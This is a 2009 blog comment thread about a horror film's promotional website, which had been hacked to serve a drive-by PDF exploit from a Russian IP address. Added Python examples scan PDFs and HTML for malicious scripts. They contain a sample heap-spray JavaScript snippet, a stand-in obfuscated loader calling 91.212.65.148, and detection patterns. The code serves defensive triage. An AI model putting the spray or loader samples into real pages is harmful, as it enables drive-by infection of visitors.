Well, folks. Some filmmakers are in town. They’re making a movie up in Pittsburg.
I can make some guesses about what happened to the people of Friar:
They spent their days trying to translate between Unix and Windows, and grew ever stranger and more peculiar, until one night ...
Not to my taste, thanks. But it looks like it should be decent for horror fans.
Um. The making a movie site link triggered my browser's fraudulent website warning and directed me to a Google Safe Browsing diagnostic page, which reported the following:
"The last time Google visited this site was on 2009-06-16, and the last time suspicious content was found on this site was on 2009-06-16. Malicious software includes 143 trojan(s), 48 scripting exploit(s), 27 exploit(s)."
FYI, here's the address of the Google page to which my browser directed me:
http://google.com/safebrowsing/diagnostic?tpl=safari&site=91.212.65.148&hl=en-us
Here's their MySpace page.
(I'm not getting Google alerts, nor are any of my AV programs popping up warnings....)
The site does have annoying music....
91.212.65.148 seems to be located in Russia. I'm pretty sure that yellowbrickroadthemovie.com isn't hosted there.
Avasti AV gives me a warning on that site.
A quick check on a Linux box shows a site very dependent on Flash, apparently with no way past the opening page without using Flash and scripts.
I'm not curious enough to take chances.
I tried to check the MySpace page and my eyes fell out.
A totally safe site:
http://www.granitestatenews.com/Articles-c-2009-06-10-148766.113119_Horror_on_Main_Street.html
I'm back home now. Yellowbrickroadthemovie.com is at 67.228.235.94
91.212.65.148 is indeed somewhere in Russia. I dunno how that popped up.
The official site is pretty darned Flash-heavy.
Here are the sub-pages:
http://www.yellowbrickroadthemovie.com/CONTACT.html
http://www.yellowbrickroadthemovie.com/TRAILER.html
http://www.yellowbrickroadthemovie.com/LEGEND.html
http://www.yellowbrickroadthemovie.com/EXPEDITION.html
http://www.yellowbrickroadthemovie.com/MESSAGE.html
The trailer doesn't seem to exist. (Seeing as the principal photography hasn't happened yet, this isn't surprising.)
I don't have a knee jerk reaction against Flash - it's great for games, interactive artworks, video and music players, visualisation tools...
But why why why is someone using it to navigate through what are basically a set of pages of text with still pictures? Oh well...
Drifting back on topic, I love seeing my city (Melbourne, Aus) on film. I even rented Queen of the Damned (don't!) just to play "look for the Melbourne locations".
Steve Taylor @ 10 ...
I do have a knee-jerk reaction against flash. When it's used appropriately, it's almost invisible -- but it's so often used inappropriately that my first reaction is inevitably "not -that- again" followed by closing the window.
xeger at #11 writes:
> I do have a knee-jerk reaction against flash. When it's used appropriately, it's almost invisible -- but it's so often used inappropriately that my first reaction is inevitably "not -that- again" followed by closing the window.
I admit I do use the Firefox "FlashBlock" plugin in self defence. I just wish there was a setting to not animate animated gifs without my permission. But then I've got to defend myself against javascript and dhtml based animation as well. Why can't people just play nice?
Jim, #9: I didn't have any trouble with your original link (which does indeed go to yellowbrickroadthemovie.com), and the trailer was there when I clicked on it. That's what prompted my post #2, was watching it.
Ah yes, I see. There is a trailer. It just takes forever to download.
My Norton 2009 is popping "Bloodhound.Exploit.196" which it identifies as a heuristic virus. The warning showed up as soon as I connected to the site.
yep, I got a trojan horse and a dropper virus from that site :-(
Yeah, when I loaded that site, it tried to redirect me to a PDF containing javascript that tries to exploit heap-overflow bugs in Adobe Acrobat. It's quite a bit less obfuscated than the last time I saw this, and has amusing comments in it like
//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141 ;)
and
//adobe reader 8 works also with app.setTimeOut?
Should contact the owners of the site and tell them they need to clean it up. I've saved the malicious PDF and the decoded javascript in case anyone wants to see them.
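The commenter above describes the classic shape of a drive-by PDF: JavaScript that runs on open, uses app.setTimeOut, and sprays the heap with 0x90909090 so a corrupted pointer lands in a NOP sled. For anyone who has saved such a file and wants to triage it offline, here is an added Python example (not code from the thread or from any commenter) that searches a PDF for those indicators. Real samples usually tuck the script inside a FlateDecode stream, so it inflates every stream it can before searching. The sample PDF, the indicator names and the builder functions are all constructed for this example.

```python
import re
import zlib

# Indicators drawn from the behaviour described above (JavaScript triggered on
# open, app.setTimeOut, a 0x90 NOP-sled heap spray) plus generic PDF-JS markers.
# Names are my own; they are not a standard taxonomy.
INDICATORS = {
    "javascript_action": rb"/(?:JS|JavaScript)\b",
    "open_action": rb"/(?:OpenAction|AA)\b",
    "settimeout": rb"app\.setTimeOut",
    "nop_sled_spray": rb"(?:%u9090){2,}|(?:\\x90){4,}|0x90909090",
    "shellcode_unescape": rb"unescape\s*\(\s*['\"](?:%u[0-9a-fA-F]{4}){8,}",
    "embedded_file": rb"/EmbeddedFile\b",
}

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def inflate_streams(pdf: bytes) -> bytes:
    """Return the concatenated contents of every stream that zlib can inflate.

    Streams that are not Flate-compressed raise zlib.error and are skipped;
    their raw bytes are already part of the file and get searched anyway.
    """
    out = []
    for m in STREAM_RE.finditer(pdf):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass
    return b"\n".join(out)


def scan_pdf(pdf: bytes) -> dict:
    """Count indicator hits in the raw file plus its inflated streams.

    'suspicious' is set when JavaScript is present together with something
    that makes it fire or look like an exploit (auto-run action, heap spray).
    """
    corpus = pdf + b"\n" + inflate_streams(pdf)
    hits = {name: len(re.findall(pat, corpus)) for name, pat in INDICATORS.items()}
    hits = {k: v for k, v in hits.items() if v}
    suspicious = "javascript_action" in hits and any(
        k in hits for k in ("open_action", "nop_sled_spray", "shellcode_unescape")
    )
    return {"hits": hits, "suspicious": suspicious}


# ---- constructed samples (not the real file from the thread) ----------------
MALICIOUS_JS = (
    b"var sled = unescape('%u9090%u9090'); while (sled.length < 0x10000) sled += sled;\n"
    b"app.setTimeOut('payload()', 1000);"
)


def build_sample_pdf(js: bytes, compress: bool = True) -> bytes:
    """Minimal PDF whose catalog OpenAction runs the given JavaScript."""
    body = zlib.compress(js) if compress else js
    filt = b"/Filter /FlateDecode " if compress else b""
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << " + filt + b"/Length " + str(len(body)).encode() + b" >>\n"
        b"stream\n" + body + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


def build_benign_pdf() -> bytes:
    """One-page PDF with a plain content stream and no scripting at all."""
    content = b"BT /F1 12 Tf 72 720 Td (Hello) Tj ET"
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"
        b"4 0 obj << /Length " + str(len(content)).encode() + b" >>\n"
        b"stream\n" + content + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


if __name__ == "__main__":
    print(scan_pdf(build_sample_pdf(MALICIOUS_JS)))
    print(scan_pdf(build_benign_pdf()))
```

This is a triage aid, not a verdict: a PDF with JavaScript and no auto-run action can still be hostile, and malware that hides its script in object streams or behind other filters will need a fuller parser. What the script does reliably is tell you quickly whether a file someone asks you to "just look at" deserves a sandbox instead of Adobe Reader.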
Steve Taylor @12, in the Firefox about:config page, you can set "image.animation_mode" to either "none" or "once", or reset it back to "normal".
Okay, you guys have got me all paranoid now. I didn't have anything pop up on me, but I'll get my partner to run a full virus sweep while I'm off at the dentist.
Following up to myself to say that I can't actually find any contact info for the people responsible for that website. Neither CONTACT.htm nor CONTACT.html actually exists, there doesn't seem to be contact info anywhere else on the site, and their whois listing points to a very large hosting provider, midphase.com. I have emailed that provider's technical contact address, but I doubt that will have any effect.
Jim, if you have actually seen these film-makers, maybe you'd better pass on the malware warning. Somebody on the website side has been either careless or malicious.
If you haven't, do they even exist?
I'm just back from spending the day with them. They're nice people. I'll let 'em know.
I've disabled the link until the virus situation is resolved.
FWIW, I'm running Firefox with NoScript.
Jim @25:
The three infected files are all copies of "Trojan horse generic 13.BEGH"
And the random irreverent part of me pictures a large white horse, with a bar code on its side just below the word HORSE in sans-serif lettering.
TrendMicro give a completion time of 21 1/2 days. This might just take some time....
I did not hallucinate Jim's comment about that generic Trojan horse. Did not.
abi (27): <soothingly> We believe you. </soothingly>
You didn't. But I removed it because it might give the wrong impression. Further checking through the AVG files told me that they'd entered the Virus Vault on April 9, when I was out looking for updated video drivers.
TrendMicro is down to saying just four days. Things improve.
I've long considered that the existence of computer viruses is proof of the existence of original sin.
Earl Cooley III at #18 writes:
> Steve Taylor @12, in the Firefox about:config page, you can set "image.animation_mode" to either "none" or "once", or reset it back to "normal".
You star! My life is now slightly better.
All good things come from Making Light.
James: NoScript would totally block this attack; if you don't execute javascript it doesn't even get as far as reaching out to 91.212.65.148 to grab the malicious script that grabs the malicious PDF.
Their contact address is info[at]yellowbrickroadthemovie[dot]com
abi @ 27... Thought you were having a George Orr moment, eh?
It's worth finding a non-Adobe PDF viewer, so you're not 100% part of the monoculture for which the virus writers are adapted.
One thing that would be really useful is a setting or add-on for my browser, that would push the PDF file being opened off to some remote PDF-to-HTML server. Anyone know of any such thing?
albatross #35: Well, Google can do the conversion, so you could potentially just use them to look up the PDF's original URL.
Eric, the producer, thanks us for informing them that their site was hacked.
My virus scan showed no problems. Very likely the attempt was blocked by my Hosts File From Hell.
Sequential scans by TrendMicro Housecall, Malwarebytes, SuperAntiSpyware, and AVG, found a total of four tracking cookies.
I don't think I caught anything.
The post at the bottom of the thread here at BleepingComputer.com (from quietman7, Jun 9 2009, 06:22 AM) contains a ton of links to Antivirus resources.
I'm told that the movie guys were working on restoring their website. Could someone with greater ability than me take a look and see if it's (currently) clean?
As of about ten minutes ago, the site is not clean: there is still a Javascript fragment on the top-level index.html that pulls malicious code from 91.212.65.148. It is obfuscated to look like it has something to do with Google Analytics, but if you actually decode it it proves to be nothing of the sort.
I also see a very large number of spam links in /LEGEND.html, and further obfuscated Javascript that may also wind up triggering virus attacks (it is not as easy to decode as the stuff in index.html, so I haven't bothered).
The other HTML pages that are reachable from index.html (EXPEDITION.html, MESSAGE.html, NEWS.html, TRAILER.html) do not appear to contain any malicious code. They do have other problems: broken links (including not a few references to files on the website designer's local hard drive), and use of Javascript instead of CSS :hover styles for image rollovers (breaking the site for people who turn JS off).
As noted, the site is very Flash-heavy. I don't have the tools or skills to inspect Flash files for malware.
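The check the commenter above did by hand, reading index.html for a script that is dressed up as Google Analytics but actually decodes itself and pulls a loader from a bare IP address, is easy to automate for a site owner who wants to confirm a cleanup stuck. The following is an added Python example, not code from the thread or from the site's maintainers: it collects every script on a page, flags external scripts whose host is an IP literal or is not on an allowlist, and flags inline scripts that combine runtime decoding with an "analytics" disguise. The allowlist, the sample HTML and the finding labels are all assumptions constructed for this example; the sample's injected fragment is a stand-in written to resemble what the thread describes, not the real one.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site is expected to load script from (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com", "ssl.google-analytics.com"}
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Signs that an inline script decodes or writes more script at runtime.
OBFUSCATION_MARKERS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("unescape", re.compile(r"\bunescape\s*\(")),
    ("fromCharCode", re.compile(r"String\.fromCharCode")),
    ("document.write", re.compile(r"document\.write\s*\(")),
    ("hex_escapes", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")),
    ("pct_escapes", re.compile(r"(?:%[0-9a-fA-F]{2}){8,}")),
    ("ip_literal", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")),
]


class ScriptCollector(HTMLParser):
    """Gather external script URLs and inline script bodies from one page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_html(html: str) -> list:
    """Return (finding, detail) pairs for scripts that deserve a human look."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        host = urlparse(src).hostname or ""
        if IPV4_RE.match(host):
            findings.append(("external_script_ip_literal", src))
        elif host and host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("external_script_unlisted_host", src))
    for body in p.inline:
        markers = [name for name, rx in OBFUSCATION_MARKERS if rx.search(body)]
        if len(markers) >= 2:
            findings.append(("obfuscated_inline_script", ",".join(markers)))
        # A script that talks about analytics but decodes itself at runtime is
        # the disguise described in the thread; real GA snippets do neither.
        if "analytics" in body.lower() and ("eval" in markers or "unescape" in markers):
            findings.append(("analytics_lookalike", body.strip()[:40]))
    return findings


# Constructed sample page: a genuine-looking GA pair followed by a stand-in
# for the injected fragment (percent-encoded script tag written at load time).
SAMPLE_INDEX_HTML = """<html><head><title>Expedition</title>
<script src="http://www.google-analytics.com/ga.js"></script>
<script>var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-XXXXX-1']);</script>
<script>/* google analytics */ var u = unescape('%3Cscript%20src%3D%22http%3A%2F%2F91.212.65.148%2Fga.js%22%3E%3C%2Fscript%3E'); document.write(u); // urchin tracker</script>
</head><body><p>Expedition page</p></body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_INDEX_HTML):
        print(finding)
```

Run it over every .html file in the webroot after a cleanup, and keep the output from a known-good copy (or the files' hashes) so a reinfection shows up as a diff rather than as another reader's antivirus alert. Note that the same percent-encoded loader is what a NoScript user never executes: the browser never fetches the second-stage script, which is why several people in this thread saw nothing at all.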
It could have been whacked via the hosting server. My employer had a problem a while ago where their web site got on the Google-sponsored malware list, again due to weird stuff inserted in framing code. When I searched the forums there, I found that a couple other sites on the same IP address (i.e. hosted on the same physical server) had been reported with the identical problem. I suspected the web server machine was cracked or had outdated software on it; I ended up getting the company to move hosting providers.
I managed to get Bloodhound.Exploit.196, several trojans, as well as the dreaded Spyware Protect 2009. It has taken me three days to clean up the machine, since Spyware Protect wormed its way into both the registry and the System Restore files.
Ah well. It's good to know that a trailer for a horror film creates actual horror. Somehow this seems right, in our post-digital age.
The film is Yellow Brick Road. It has an official trailer, now, that you can see at http://www.youtube.com/watch?v=RfX78jrrmi8
At IMDB it's http://www.imdb.com/title/tt1398428/
And they have a MySpace page at http://www.myspace.com/yellowbrickroadthemovie
Later on, maybe, I'll tell you about my two days as set medic.